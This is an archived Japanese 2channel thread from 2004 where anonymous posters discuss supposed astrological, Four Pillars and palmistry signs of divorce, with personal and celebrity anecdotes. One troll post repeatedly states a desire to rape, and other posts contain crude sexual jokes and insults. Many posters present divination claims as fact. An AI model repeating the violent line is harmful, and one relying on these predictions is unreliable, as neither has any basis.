5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

++離婚相++

1 :名無しさん@占い修業中:04/04/05 23:35 ID:???
西洋・東洋問わず離婚相ってありますよね。サンプルや実例をください。
ちなみに四柱推命でみてもらったところ、私の周りの友人、兄弟、過去の恋人
いずれも離婚相とやらがあるといわれ、どうも眉唾ものだなあと思っているのですが。


2 :名無しさん@占い修業中:04/04/06 00:11 ID:3b108Xm7
2

3 :名無しさん@占い修業中:04/04/06 12:30 ID:???
「命理一得」には、離婚の命として載ってるよ。
ちょっとだけ教えるわな。

女命 丙午、甲午、庚子、戊寅。

男命 乙酉、辛巳、丁卯、壬寅。

俺、壬寅だけど離婚してないよ。



4 :名無しさん@占い修業中:04/04/06 16:31 ID:???








5 :名無しさん@占い修業中:04/04/07 03:11 ID:???
西洋だと
7室月の人って離婚してる人多いです。
7室月が4人居ますが、3人が離婚。30台後半で離婚してます。残る1人はまだ20台で新婚。
私の周りの話なので、もっともっと沢山の症例が必要なんだけど
参考までに

6 :名無しさん@占い修業中:04/04/08 22:36 ID:UpmVUvh8
>3
女性にしては運が強いから離婚しやすいとかいわれるのはそれが所以?
しかし今のご時世あまり当てはまらないようなきもするけど。
3さん自体、離婚してないようだけどその星の離婚の実例は多いんでしょうか。

7 :3:04/04/08 23:22 ID:???
壬寅で知ってるのは、高倉 健、太地真央。
壬寅は男女共離婚命。

丙午は、浅丘ルリ子、浅香光代。

今、TVで淡路恵子が金之助の苦労話やってたが、
金之助の前妻有馬稲子は甲午。

最近の芸能人の命式は出していないので知らん。



8 :名無しさん@占い修業中:04/04/08 23:26 ID:???
結婚生活は7室でなく8室って説は信憑性ある?
イマイチ理由がよくわからないんだけど。

>>5
その人たちの月のアスとサインは?
しかしソフトにしろハードにしろ
7室に家庭・感情である月が入ることによって
パートナーが家庭にとって大きな位置づけを示すとは言えるかも

ところで私は七室雄牛火星だがパートナーとは常に
めったに喧嘩はしない。仕事先でであったりとかでもない。
ましてやライバルでもない。

9 :名無しさん@占い修業中:04/04/08 23:34 ID:UpmVUvh8
>3
レスサンクス
かなりサンプルに年代を感じるところをみると3さんはかなり長いこと研究しているとみた(W
たしかに高倉と大地なんかみると頷けますね。男女ともに離婚といわれる命式を持つと離婚に結びつくのでしょうか?
離婚はしていないという3さんのお相手の命式が気になるところです

10 :名無しさん@占い修業中:04/04/09 00:15 ID:???
女性にとっては太陽と火星のハード、男性にとっては月と金星のハード。
男女とも太陽と月のハード。
月と天王星のアス。>>88室は結婚生活を表すからじゃない?
天王星in7室は結婚相手の不安定さ。
天王星in8室は結婚生活の不安定さで関係あるだろうね。
火星in7室は対人関係の悪さで直接離婚相に繋がるかな?
とりあえず思い出せるところはこんなもん。

11 :名無しさん@占い修業中:04/04/09 00:18 ID:???
女性
傷官が正官をみるとき
食神が偏官をみるとき

男性
劫財が正財をみるとき
比肩が偏財をみるとき

12 :名無しさん@占い修業中:04/04/09 00:20 ID:???
手相の結婚線の異常
男顔の女

13 :名無しさん@占い修業中:04/04/09 09:19 ID:sc/8OPzj
女で7ハウスに太陽月火星合。4ハウスに天王星。離婚してません。
っていうか、結婚自体してません。かなり高齢ですが。男顔です。

14 :名無しさん@占い修業中:04/04/09 13:44 ID:p3Id8xib
太陽と月の合は独身相ですから
7室にはいるとなお更(ry

15 :名無しさん@占い修業中:04/04/09 13:53 ID:???
占いの世界って、こういうこともあるのよ・・・

http://mearyan.dnsalias.com/nichiekiren/

16 :名無しさん@占い修業中:04/04/09 22:54 ID:WEJ2NZCv
>>10
八室=結婚生活
七室=パートナー
なんですね。

しかし、パートナーありきの結婚生活であるから、七室が傷ついていて八室がそうでない場合の結婚生活が予想できません。
それとも八室の結婚生活というのは結婚後の金運や暮らしのことなんでしょうか。
そうだとしても離婚の有無に結びついているようないないような…

17 :名無しさん@占い修業中:04/04/10 22:03 ID:???
あげ

18 :名無しさん@占い修業中:04/04/10 23:03 ID:???


   人
  (::::::::)
 (:::::::::::::::)
(::::::・∀・::::::)



19 :名無しさん@占い修業中:04/04/11 02:48 ID:tIB0XGjl
>>12
うちの母親、結婚線二股だが離婚の離の字もない。
さらに後家運とか言われてるが問題なく結婚生活30年間送ってる。
まあ父が母より10近く年上なんで後家運の可能性は高いかもしれないがその程度のことだし。
離婚運とかは本当に占いで読むのは難しいような。相手によりけりだと思うよ。
相性っていうかね。

20 :名無しさん@占い修業中:04/04/11 02:56 ID:sFA/XTWI
>>19
あと離婚率の増加の問題もあるよね・・

昔は離婚は稀だったけど、今は確か、新しく結婚するカップル
の三組に一組が別れるんじゃなかったっけ?

そういう場合は離婚相を持った人が増えるのか?とも思うし、
ちょっと怪しいと思ってしまう。

21 :名無しさん@占い修業中:04/04/11 03:03 ID:???
>19
たしかに。
それに一夫多妻制だったりすると離婚とかあまりあり得ないし。
でも古くから離婚の有無を調べる方法が占いの世界にはあったんだと思うから
なんらかの法則はありそうなんだけどね。

22 :名無しさん@占い修業中:04/04/11 03:14 ID:???
以前つきあってた彼、四柱推命や五行でみると私とまれにみるよい相性で、結婚したら最高といわれた。
しかし実際は彼は浮気症だわ、うそつきだわ、実家に問題はあるわでどうみても
結婚にはむいてない。私は彼とつきあって心労でやせ細ったよ。
今は別れてるけど、あんな人と結婚してたらいったいどうなっていただろうと思う
彼は今は家庭持ってるけど毎日出歩いて家も子供もほったらかしらしみたい
多分>>3さんのいってる離婚の相もってる人だったはずです。
でも、彼の場合家庭の事情で離婚は禁じられている。
だから、離婚はありえないんです。
本当に離婚相てやつがわからなくなってきた。
あってないようなものなのか。

23 :名無しさん@占い修業中:04/04/11 08:32 ID:???
あ〜ちょっと占いかじると
私ってば離婚相?って思ってしまう…
7室天王星だし、太陽と火星は衝だもん
おまけに四柱だと命式に
正官と偏官が混在…

30過ぎてまだ未婚だけど、なんとかならんもんかと

24 :名無しさん@占い修業中:04/04/11 09:13 ID:???

>>23
未婚なら、離婚のしようもないわけだが

25 :名無しさん@占い修業中:04/04/11 18:41 ID:???
>>5>>10
自分、太陽×月90度で7室月です。太陽は10室。働いた方がいいのかな。
離婚したくないよ・・・言われちゃう方なのかなぁ。
8室には牡牛火星と双子金星が入ってます。離婚になったら報告にきますね。
などどへこんでみるテスト。

26 :名無しさん@占い修業中:04/04/11 20:30 ID:KPM+zyJb
うちのダンナ、もろに離婚相です。
太陽と月がスクエア、金星、火星と月もスクエア、おまけに辛巳。
まだ離婚はしてないけど、仕事で出張ばかりでほとんど家にいません。
盆も正月もゴールデンウィークも家族と過ごしたことはない。
家には寝に帰るだけ。会話もほとんどありません。
「あんな人と結婚して何が楽しいの?」と友達や親にも言われる。
でも、今のところ離婚する気はない。
結婚するとき「浮気、ギャンブル、暴力」をしたら離婚する、といってあるので、
まだ約束を守っている以上離婚する理由がない。

27 :名無しさん@占い修業中:04/04/11 20:49 ID:???
>>23
>30過ぎてまだ未婚だけど、なんとかならんもんかと

そんなのいま普通
ありきたり杉


28 :名無しさん@占い修業中:04/04/13 10:47 ID:iT6soP1J
>>19
結婚後に急に活動的になったり、
結婚生活以外の生きがいが出来たりした人(女性)も
結婚線が二股になるとも聞いた事があります。
その場合、二股に分かれた線のうち、上の線が上方に
はねあがっているそうです。

29 :名無しさん@占い修業中:04/04/13 11:50 ID:K4sFLzEJ
>28
うわ
私結婚線それです
しかも同棲してた彼と別れた直後(一昨年の暮れ)からそうなりました
ちなみに跳ね上がった線は長く、薬指の下までのびてる
なんか意味があるんでしょうか

30 :名無しさん@占い修業中:04/04/13 12:58 ID:???
>>29

玉の輿せん??

31 :29:04/04/13 13:07 ID:K4sFLzEJ
>30
たしかに長く線はのびてますが二股にわかれてるわけで…
分かれた上の方の線がやたら長くて上に跳ね上がってるんですよ。
二股に分かれた結婚自体は離婚とか別居らしいですよね。よくわかりません

32 :名無しさん@占い修業中:04/04/13 13:58 ID:???
うちの父、7室に天王星。
母は個性強いというか女王様(年追うごとになってきた)。
昔は耐える妻ってやつ。
そんでもって神経症。完璧主義者ってやつかな。

離婚の危機は数知れず。
「母が離婚したい」と思うこと多かったみたい。
父は「離婚したら、母について行く」(それって離婚じゃねーじゃん)と言ってます。


・・・私が離婚することになりましたが。
ちなみに同じ年で同じ誕生日の従兄弟も離婚しています。(再婚したけどね>従兄弟)

33 :名無しさん@占い修業中:04/04/13 14:07 ID:???
>>26
そんなアスペクトでもミュータブルにあるのとフィックスドにあるのとで
だいぶ違うと思いますが。

34 :名無しさん@占い修業中:04/04/13 15:19 ID:???
>32
そういうあなたはどんな星もってるの?
うちの母も年とるごとにキツくなってるなぁ
相性の問題もあるのかな?



35 :名無しさん@占い修業中:04/04/13 15:31 ID:???
7室に海王星と金星がいます・・・。ちなみに射手。

従兄弟と比べてみたいけど、従兄弟は出生時間がわからないので、
ハウスが何とも言えない。
叔母の話によると、夜中らしくて、
それが誕生日の日になってすぐなのか、誕生日の翌日になる直前なのか謎。


36 :名無しさん@占い修業中:04/04/13 16:05 ID:???
数えたらキンタマに46本
シワがありますた

これは離婚相でつか


あ、チンポもじぃーっと見てたら
細かなシワが何本も縦に伸びてまつ(亀頭)
シャキーーンするとシワ消えます
心配ないでげすか





37 :名無しさん@占い修業中:04/04/13 16:47 ID:???
うちの姉。7室蠍座海王星。
月、水星、冥王星と調和角。
良いのか悪いのかわからんかったけど、
見合いで祝福され結婚→8年後離婚。
精神的に不幸な結婚生活に疲れ、離婚時はノイローゼ状態。

ただ、離婚原因としては
姉の子供嫌い&セックスレスでギクシャクした夫婦仲。
しかし周囲からは跡継ぎを望まれる環境…
とゆ〜のが強いんだけど、
これらは5室乙女座冥王星&8室山羊座火星の表す事柄かな?

38 :名無しさん@占い修業中:04/04/13 17:13 ID:???
手相が初心者なのですが
手相って、どっちの手を見たらいいんでしょうか?

>>28さん
私は両方の手の結婚線が、二股になってます。
そして、左手は、上の線が上方にはねあがり
右手は、下の線が下方に落ちています。

どっちが本当なんでしょうか・・・スミマセン

39 :名無しさん@占い修業中:04/04/13 21:10 ID:???
今度離婚したら3回目です
2度あることは3度ある?

40 :名無しさん@占い修業中:04/04/14 01:29 ID:???
>>39
そりゃ占いじゃなく迷信かと…

あと、土星4室も離婚しやすいかも…

土星4室が2人居ますが(共に30代男性)
一人は既に家庭内別居、もう一人はこないだ離婚しました。

41 :35:04/04/14 11:02 ID:???
>40

どきっ、私、4室に土星がいるんですが(笑

42 :名無しさん@占い修業中:04/04/14 13:11 ID:???
私は月(双子)が7ハウス(←火星木星とtスクエア)で、
4ハウスに土星がありますが、結婚10年目に入り、
現在も家族仲良く暮らしていて、離婚は一度も考えた事はありません。

3年くらい前に、トランジットの土星がtスクエアのn月に合になりましたが
その時も全然離婚の気配はありませんでした。
(その時期、仕事での責任が重くなり強いプレッシャーはありましたが…。)

そういう人もいる、、という事で。

(4ハウス土星で思い当たる事は、選んでいる訳ではないのですが、
何度か引っ越しをしていますが住む家は築年数がかなり古い家ばかりです。(^_^;;;)

43 :名無しさん@占い修業中:04/04/14 21:06 ID:bSdVQOF+
>33
ダンナは、太陽、月、火星、金星、水星、冥王星全部柔軟宮です。月が魚で冥王星が乙女、あとは全部いて座。
強烈なTスクです。何かもろに性格悪そう・・・。(まあ、人付き合いは全くダメです。)

44 :名無しさん@占い修業中:04/04/14 22:51 ID:???
知り合いの夫婦は、月同士オポ
(ダンナさんは月山羊、金星天王星合とスクエア
奥さんは月蟹、太陽とゆるくスクエア)で
結婚前、ダンナさんの月に土星がのった頃一度別れて、
その後復活して結婚。そして今、今度は奥さんの月に
土星がのろうとしている。
ここをのりきれば、もう大丈夫?と思うんだけど、どうなるか?


45 :名無しさん@占い修業中:04/04/16 02:31 ID:8st+9s87
最期はその人の意思が決めることだからなぁ。
自分とパートナーとの合わなさを、何かで説明のつくように合理化してくれるものを
求めているんじゃないかな。
気持ちの整理のつかなさを正当化してくれるものを求めて、せっかくなんとかなりそうなものに
部外者のよからぬ憶測を持ち込むと、関係がこわされたり、いかがわしい人間たちの
犠牲にされかねないから注意しないと。
離婚を絶対する相なんて、所詮は昔の人の思いこみと偏見を法則化しようとしたにすぎないんじゃないかな?
人相なんて、その時におかれた状況によって当然違ってしまう。
顔のつくりは変えられなくても、感情によって表情は変わってしまうもの。
また、鑑定者の主観や思いこみ、そして被鑑定者に対する好悪の感情によって、
鑑定結果が左右されてしまうことだってあり得る。
鑑定をしてあげている相手に惚れたら、旦那や奥さんと別れさせてモノにしよと考える
いかがわしい占い師にひっかからないように、最後にはふたりの意志で決めることが
将来を決定するような気がしてならない。
それは、「他にもっと幸福があるんじゃないか」という欲があるから、
別の相手を求めてしまうのかもしれない。
その気持ちを吹っ切れないと、
自分から離婚相だと思い込んで破滅に突進してしまうんじゃないかな。

46 :名無しさん@占い修業中:04/04/16 08:01 ID:???
>>45
どこを縦読みですか?

47 :名無しさん@占い修業中:04/04/16 09:37 ID:???
>>45
私も自分の意思次第だと思うよ。

よく言われる「7ハウス天王星」だって、天王星が7ハウスだから別れるんじゃなくて
7ハウス天王星の人は、人間関係に変化や刺激を求めやすく、でも結婚生活なんて
何年も一緒にいれば誰でもマンネリにはなる。
7ハウス天王星の人は、それが耐えられなくなり、刺激や変化を求め、で離婚。
だから、離婚したくないのなら、自分が変化や刺激を求めているという事に気付き
それを他の何かに振り返るなら、離婚には至らない。
「星のせいで離婚」なのではなくて、結局は自分次第。

48 :名無しさん@占い修業中:04/04/16 18:51 ID:???
4室に木星、太陽と火星はタイトにトラインなのに、
結婚する気配もない。もちろん離婚もしたことない。
そんな私はもう30半ば・・・・・・・。
ウオオオン(T_T)

49 :名無しさん@占い修業中:04/04/16 22:22 ID:???
私の手相、ケコーン線が二股なんだよね。一本目は上に向かってまっすぐに伸びてて
もう一本はしたのほうに斜めにくだっていってるカンジ
ケコーンしたことはないけど前の人と別れて以来半年も彼氏ができない…
このまま一生できないのかな…しかもこの手相になったのは別れてすぐだし
欝だよ

50 :名無しさん@占い修業中:04/04/17 10:49 ID:VGu6R2F6
>>49
私全く一緒の手相してるよ
しかも同じく前の彼氏と別れた後。
今彼氏いるけどね。
前の彼とは一緒に暮らしてたし
夫婦みたいなもんだったから離婚みたいなものかも
ていうか、離婚なんて人間が決めた制度なんだから、
それが占いに現れるってなんか変じゃない?
一度付き合って同棲して四六時中一緒にいて、
なにが結婚と変わらないんだろ
相手の親族とかとのしがらみの有無くらいじゃない?
まあ子供のしがらみもあるか。
まだ結婚制度のない古くから手相なんかは存在していたわけで
それによって離婚を予測するのはかなり不自然かと。。。
それに、一夫多妻制なんかはどうなるんだ(w

まあでもちなみにわたしの場合、分かれた上の線が
上向きに伸び始めた辺りから新しい彼ができたよ。
あなたももうスグできるかも
できたら報告ください(w

51 :名無しさん@占い修業中:04/04/17 18:35 ID:???
>>50
最初は離婚相じゃなくて別れ相みたいな名前だったとか
それがケコーン制度ができてきて徐々に名前変わったのでは
どちらにせよ異性との別れを示す相であるってことなのかなと私は思いました

で、私の二股ケコーン線。上に伸びてるほうは小指の一センチ下ぐらいまであります
これからのびるのかな。そしたらまた新たな恋が生まれるのかななんて…
できるといいな。報告したいです。あー早く運命の人に出会いたい

52 :名無しさん@占い修業中:04/04/17 21:22 ID:Ay/a2Jx6
別れ相かぁ
別れってない方がおかしいと思うけどなぁ
永遠の愛を夢見た昔の人の幻想なのかも>別れ(離婚)相

53 :名無しさん@占い修業中:04/04/17 22:19 ID:???
うん、まあ冷静に考えるとそうだね
じゃあやっぱ離婚相か。でも上の人の手相みたいに一時的に変化するのは別れ相とか


54 :名無しさん@占い修業中:04/04/18 09:21 ID:???
私なんて結婚線の先に島ができてる上に、
島から枝線がほうきみたいに何本も生えてる!
まるでペイズリーみたい

将来どんな結婚する事やら…トホホ


55 :名無しさん@占い修業中:04/04/18 19:55 ID:???
太陽と月が合の人は独身相ぽい
特に1室にあったり、太陽と月の合に重なって他の天体が合だったりすると
そんな癖強そうだし、一人でも充分生きていけそう。

56 :名無しさん@占い修業中:04/04/21 01:00 ID:1gPd81cH
>>55
それいえてるかも
牡牛太陽月合の私の幼なじみ、
両親(主に母親)の思い入れが強すぎて
彼氏できては別れさせられたりで男っ気が全然ない。
どうやら前の子が流産かなにかだったかららしいけど。
それにしてはかわいそうだ

57 :名無しさん@占い修業中:04/04/22 02:12 ID:wj6PcdfL
あげ

58 :名無しさん@占い修業中:04/04/25 13:02 ID:7yLDxHTd
知りたい

59 :名無しさん@占い修業中:04/04/25 19:34 ID:???
7室月ってのは男女関係なくかいな?

60 :名無しさん@占い修業中:04/04/25 20:43 ID:???
>>59
個人的には関係ないと思ふ
確かに、男女問わず7室月は結婚生活で幸せとは程遠い感じ
しかし、アスペクトにも因るだろうしなあ

61 ::04/04/30 00:38 ID:FHZJcYKL
七室に天王星がありました。。。素敵な旦那様との甘い結婚生活を夢見ているのですが。

62 :名無しさん@占い修業中:04/04/30 02:17 ID:elPGCtu1
でもどうして7室月が離婚と関係あるんだろう。
だれか教えて。感情的になるからですか?月は家庭を
表すからいいのかと思ってたけど。

63 :名無しさん@占い修業中:04/04/30 02:39 ID:???
三権面の女は、必ず離婚の憂き目に遭う。
何度結婚しても、必ず離別に至る。
これ人相学の常識。


64 :名無しさん@占い修業中:04/04/30 06:52 ID:???
三権面って?

65 :名無しさん@占い修業中:04/04/30 10:18 ID:aIqWoDy2
西洋、東洋ともに離婚相
しかし、人相学ではかならずあげまんとか幸福な人相とかいわれる
じっさい顔見て嫁さんにしたいとかよくいわれるし
どっちを信じれば。

66 : :04/04/30 10:28 ID:???
                     _             _
         /         /             \  \   ____ ○
        /                   l             ヽ         |
        ,!                    ヽ、         !.      |
        |                       `>          |      |
        'i                        /         i'       /    \\  l
         ヽ.                               /      /        /
           \               丿 ー―‐‐           /      /         /



67 :名無しさん@占い修業中:04/04/30 19:00 ID:???

醜女の妄想ゴミ箱はここですか?



68 :名無しさん@占い修業中:04/05/01 08:17 ID:???
火星と土星が作用し、7室が痛み、6室、8室、12室が絡んでくると離婚に至ります。

69 :名無しさん@占い修業中:04/05/01 09:29 ID:21VnARpO
7室月と天王星あります、、、で離婚しますた。
(木星もあるんだけど)

そか、離婚相だったのか・・・

70 :名無しさん@占い修業中:04/05/01 09:52 ID:???
太陽を夫、月を妻と見た場合
男性の場合月が、女性の場合太陽が天王星とハードだと
離婚相っぽいかんじがする。
ただ、「本人が物凄く変わった性格だ」とか、「人生の目的が突然変わる」
という出方もあり得るけど。

71 :名無しさん@占い修業中:04/05/01 12:14 ID:???
太陽に7室天王星がスクエア。
付き合うにいたるまでの破局が多い、婚歴はない。
私が特別変わってることはないと思われます。
人生の目的はころころ変わります。
7室天王星は対人面において、相手に飽きるというのが付き合いが
続かない一番の原因ではないかと思いますので
予測できない行動をする変人やミステリアスな人となら
続くんじゃないだろうか。
別居婚、国際結婚も教科書にありがちです。

72 ::04/05/02 01:29 ID:zPi3rKPM
私も七室に天王星、そして八室に海王星。。。
私はいったいどんな結婚をするんだろうか。。。
海王星はいろんな星とスクエアやオポジションを作って緊張しまくっています。
天王星は緊張はなく、金星と120度です。
どうなんだろう。。。
今お付き合いしている方は真面目な方だけど。。。
というか、私が変人なので、私からしたらよくわからない人なんだけど。。。
普通のサラリーマンになってしまったし。


73 :名無しさん@占い修業中:04/05/14 10:46 ID:???
   ∧_ ∧ ( プッ )
   ( ・ω・` ) ノノ〜′
    (⊃⌒*⌒⊂)
     /__ノωヽ__)


74 :名無しさん@占い修業中:04/06/15 01:11 ID:???
手相は利き手が現在、未来で利き手じゃないほうが過去みたい
薬指のしたまで伸びた結婚線はとっても望ましい結婚線で自分が
最高と思える相手と結婚できるって
でも結婚は結婚線だけじゃなく感情線運命線太陽線とか手の形手
のひらのふくらみなんか全部みるからそれだけじゃわからないよ

75 :名無しさん@占い修業中:04/06/18 08:36 ID:???
>>22
相性がいいといっても、当人双方にとってグーな場合は稀
たいていどちらかが、我慢を強いられる
我慢してもらってる方にしてみりゃ万々歳

76 :名無しさん@占い修業中:04/06/25 15:44 ID:???
離婚しました。
太陽水星金星火星が合で天王星冥王星とスクエア。


77 :名無しさん@占い修業中:04/06/25 20:26 ID:???
>76
1968年生まれ?
某著名人(故人)もそのアスペクト持ちで離婚経験有りだったが。

78 :76:04/06/27 16:14 ID:???
>>77
あっ、そうです。
その著名人がどなたかは知りませんが、誕生日が近いのかな。

79 :名無しさん@占い修業中:04/06/30 13:19 ID:mhwphGsG
離婚の相ってあるだろうけど
身内に離婚した人は離婚しやすいね。
絶対心のどこかに「あの人がやったんだから、じゃあ私も」
という感覚はあると思う。

同じく無職ヒキも。
身内の誰かが少なからずそういう見本を見せてて
それをマネしてることがよーくある。

80 :名無しさん@占い修業中:04/06/30 18:50 ID:???
離婚とか自殺とか、身内にいると多いよね。
遺伝?とか思ったけど
>心のどこかに「あの人がやったんだから、じゃあ私も」
っていうの禿堂。
身内ならなおさら真似るというか、普通なら避けたい事も
身内がやってると選択肢に入れちゃうんだろうね。

81 :名無しさん@占い修業中:04/06/30 23:23 ID:???
>>72
旦那が7室天王星・8室海王星/金星です。
友人関係は広く浅くですが、恋愛期間は長かったし、飽きっぽいというのはなかったかも。
あまり私に執着があるようには見えないのが天王星ぽいかなw。
8室の星2つも、今のところは問題なく機能してくれてそう。
ハードアスがないのがいのかもしれません。

82 :名無しさん@占い修行中:04/07/01 02:18 ID:???
レイプしたいレイプしたい

83 :名無しさん@占い修業中:04/07/01 10:25 ID:CHbUElNm
>>80
>80
人は自分が思ってる以上に身内の真似をしてるものだよね。
特に配偶者に対する態度は父親そっくりになる。
遺伝も大きいけど。
ちなみに、思考は母親から、感情は父親から遺伝するらしい。

84 :名無しさん@占い修業中:04/07/01 10:33 ID:???
>薬指のしたまで伸びた結婚線はとっても望ましい結婚線で自分が
>最高と思える相手と結婚できるって

元カレがそうでした。その人は結婚に全く興味がなくいまだに独身ですけどね。

85 :名無しさん@占い修業中:04/07/01 12:03 ID:???
4組に1組は離婚する時代なんだっけ?


86 :名無しさん@占い修業中:04/07/01 13:08 ID:WC493rQv
丙辰って離婚相?

87 :名無しさん@占い修業中:04/07/01 13:31 ID:???
偏官の女性って離婚率高そう
あと寅年の8月生まれも


88 :名無しさん@占い修業中:04/07/01 13:57 ID:???
  ,;;《iiミミミミii巛ミミ彡ミミ;;,,
  彡ミミミミミミ巛三三ミミミミ;,,
  巛ミミ《《《llll;;|ミミミ《彡彡彡ミミ》ミ
  巛ミ《llli/⌒` '" `゙゙ヾ三》巛彡ミ
  ミ巛llノ    ─    ミ》》》ミミヾ
  ヾミi/  ー   '_,,,,,,  ゞ》》》彡ミ
  彡/,-一ヾ ,i / _  `  ミ)))ミミ彡
  川|  ,.。- ) /、' °ヽ-  |||))ミミ彡
  彡) ' ノ/ ゝ   ̄    ||lゞ三彡   ________
  |l||.i^  / ヽ      r |l(.6ノミ  / 小泉改革宣言 自民党がぶっ壊れるか小泉内閣が壊れるか
   ミ(  (ゝ-'ヽ 'ヽ      |ー'彡  |  改革なくして成長なし 痛みに耐えて米百俵
   ヾ|!  ノl  _  ヽ    〉 川ミノ  |  道路公団・郵政民営化 痛みから成長へ
     |  r-─一'冫)   ノ |巛ノ <  動かせニッポン 自民党 テーマはニッポン 自民党
     `| '  ̄´  ノ ! _,.. '  |彡   |  人生いろいろ 会社もいろいろ 社員もいろいろ
      !,  ,  ' ノ'  i. ヽ|_    | 
      `-┬ '^     ! / |\   \  国民よ。 感動しる!!



89 :名無しさん@占い修業中:04/07/01 13:58 ID:???
俺 1974年2月生まれ
嫁 1973年12月生まれ

最近うまくいってないんだけど、どうなんすかね。。

90 :名無しさん@占い修業中:04/07/01 16:41 ID:???
そ、、そんなアバウトな出生データじゃなんとも言えないよ
出生時間と出生地(最低でも都道府県まで)も必要だし。
それと、相性鑑定スレがあるからそっちで頼んでみたら? 板の上の方から行ける。

91 :89:04/07/01 18:20 ID:???
初心者なもんで・・・スマソ。
しかも誘導までしてくださって…ありがとうございますm(_ _)m

92 :名無しさん@占い修業中:04/07/01 18:27 ID:???
>>85
今3組に1組にあがったらしいよ。
あと結婚するカップルの5組に1組が
(どちらか、あるいは両方が)再婚なんだって。

93 :名無しさん@占い修業中:04/07/01 21:00 ID:gbhvZusG
これは私見なんですけど月星座でいうと水瓶座の人が(特に女性)
離婚率高いように見受けられる。

あと、月が土星か天王星とハードアスだと離婚率高いですよね。

94 :名無しさん@占い修業中:04/07/01 21:17 ID:???




 |   |   ‐ー  くー | 
 ヤヽリ ´゚  ,r(、_>、 ゚'}

95 :名無しさん@占い修業中:04/07/01 21:27 ID:???
がちがちにタイトな月土□持ってるから
そういう意見見ると凹むなあ
男だしモロ離婚相か
さらに7室天王星に金星□
これで離婚しなきゃ誰がするんだって相だ

96 :名無しさん@占い修業中:04/07/01 21:39 ID:???
ここで言われていること全てが正しいとは限らないが
殆ど当てはまるな。
太陽月が合で1室とか
土星が4室とか
太陽土星がスクエアとか
月が水瓶とか
偏官が多いとか



ケコーンすらしてないのだが。

97 :96:04/07/01 21:41 ID:???
というか↑は離婚相ではなくて独身相かも…

98 :名無しさん@占い修業中:04/07/02 01:00 ID:vJ13PXRA
で丙辰は離婚命?

99 :名無しさん@占い修業中:04/07/02 01:26 ID:fe6pLu5m
>>3
母が庚子だけど、離婚してないなぁ、、いつも父の悪口を言っていますが。。
父は己丑。もれは癸未。
妹が>>98が言っている丙辰。気が強いので離婚相かも。まだ未成人ですが..

100 :名無しさん@占い修業中:04/07/02 09:03 ID:???
100

101 :名無しさん@占い修業中:04/07/02 13:44 ID:???
推命だと日月の冲刑とか?
私、日月冲刑です。西洋だと太陽(8室)と月がスクエア。
推命と西洋の星が重なって感動したが、、、離婚相だよ;;
結婚してるけど確かにいつも離婚を考えてるのは否めない。


102 :76:04/07/02 21:04 ID:???
>>93
月水瓶だ…(女)

103 :名無しさん@占い修業中:04/07/02 21:25 ID:???
102さんは、某有名人(女)と誕生日同じか近いっぽいね。
彼女も離婚したよな。その後再婚したと記憶するが。

104 :名無しさん@占い修業中:04/07/02 21:59 ID:J3eR26vb
>>103
その著名人て誰?

105 :102:04/07/02 22:13 ID:???
大塚寧々と同じ。
再婚してないけど。

106 :名無しさん@占い修業中:04/07/02 23:51 ID:MTO9YuFv
太陽と月スクエアが離婚相ってここだけで出てる話しでしょ。
他では聞いた事ないんだけど。自分もそれあるけど、いたって平和です。
死ぬまで離婚しないと思える。それに室とかあとのアスペクトは
無視できるほど確かな離婚相じゃないと思うけど。

107 :名無しさん@占い修業中:04/07/02 23:55 ID:???
俺はホクロの位置で離婚を見抜けるぜ。

108 :名無しさん@占い修業中:04/07/03 00:00 ID:ZjJMtPW9
>>107
え?どこどこ?

109 :107:04/07/03 00:15 ID:???
商売にしたらそれだけで食っていけるほどのものだ。
申し訳ないけど教えるわけにはいかない。

最近思うんだけど、今の10〜20歳代にかけて、めっぽう離婚相の出てる人が
多いなぁ〜って感じる。2人に1人くらいの割合かなぁ。

110 :名無しさん@占い修業中:04/07/03 00:29 ID:jL/jrZ34
太陽と月って自分の両親の状態を表してるんだと思う
んだけど、それが間接的に本人の心理に影響することは
ありそう。

111 :名無しさん@占い修業中:04/07/03 00:40 ID:???
>>110
それ私も思います。自分の家庭がそうだから思えるのかもしれないけど。
私は太陽月スクエア、ASCが月とオポってTスク。
家庭が緊張しまくりで、早く逃げたかった。

>>106
太陽月のハウスとサイン、よければ参考に教えていただけますか?


112 :名無しさん@占い修業中:04/07/03 01:40 ID:ZjJMtPW9
私、太陽と月がセクタイルですけど、両親けんかばっかりしてましたよ
弟は太陽と月がインコンジャクト

同じ両親だけど・・・生まれたときの両親の関係なのかな

113 :名無しさん@占い修業中:04/07/03 01:44 ID:ZjJMtPW9
>>107さん
そうか。残念です

ほくろっていえば、女優さんって唇の横にポツンとある人が多くないですか?
化粧品のポスターとかでアップになってる写真でよくみます。
今思い出せるのが、松嶋ななこさんと中谷みきさん

・・・あ、離婚相の話じゃなかったですね。ごめん
もしわかったらそれってどんなほくろかおしえてくださーい。だめ?

114 :名無しさん@占い修業中:04/07/03 02:11 ID:???
過去スレからもってきました。



67 名前: 名無しさん@占い修業中 投稿日: 2001/04/17(火) 09:11

昔、誰かの本を読んでて月と太陽がソフトアスペクトの人は両親の
仲がいいときに生まれた子で、反対にハードアスペクトの人は両親の
仲がそれほど良くないときに生まれた子だと書いてあるのを読んだ
ことがあるのだけど、でもその本以外にそんなこと書いてある本を
他に見たことがない。
実際のところどうなんだろうね〜。


115 :名無しさん@占い修業中:04/07/03 03:54 ID:9sv3BQJ2
自分の場合あてはまるよ。母が自分を妊娠中の時に
父の浮気が発覚してショックを受けたらしいから。
太陽、月スクエア。
それに喧嘩ばかりするから仲が悪いとも単純に言えないと
思うな。決定的な不信感が二人の間になければ喧嘩しても
仲が良い夫婦は良いし。

116 :名無しさん@占い修業中:04/07/03 08:18 ID:???
太陽と月がハードな人は、結婚後
親と距離を置く場合が多いので
配偶者は心身共に負担が少なくなり、
かえって家庭円満になるお宅も多いですね。

117 :名無しさん@占い修業中:04/07/03 14:01 ID:???
セクースがハードな人は夫婦円満。

118 :名無しさん@占い修業中:04/07/05 09:59 ID:tch7n1HE
>>117
うそだ。
それしか愉しみのないヤツっているんだぞ。なさけない。
ほかにすることがあるだろうが。

119 :名無しさん@占い修業中:04/07/05 10:04 ID:???


太陽、月ハードの妹&義理の妹は、親や周囲に甘え放題でつ。
ていうか。。都合よく他者を利用するのがお見事やねぇ.. (--;
自我がつよいとゆうかぁ 天性の自己中心気質なんやね w

120 :名無しさん@占い修業中:04/07/05 10:56 ID:/4BuffL5
太陽、月ハードが何故に自己中に繋がるのかよくわからない。
説明して。

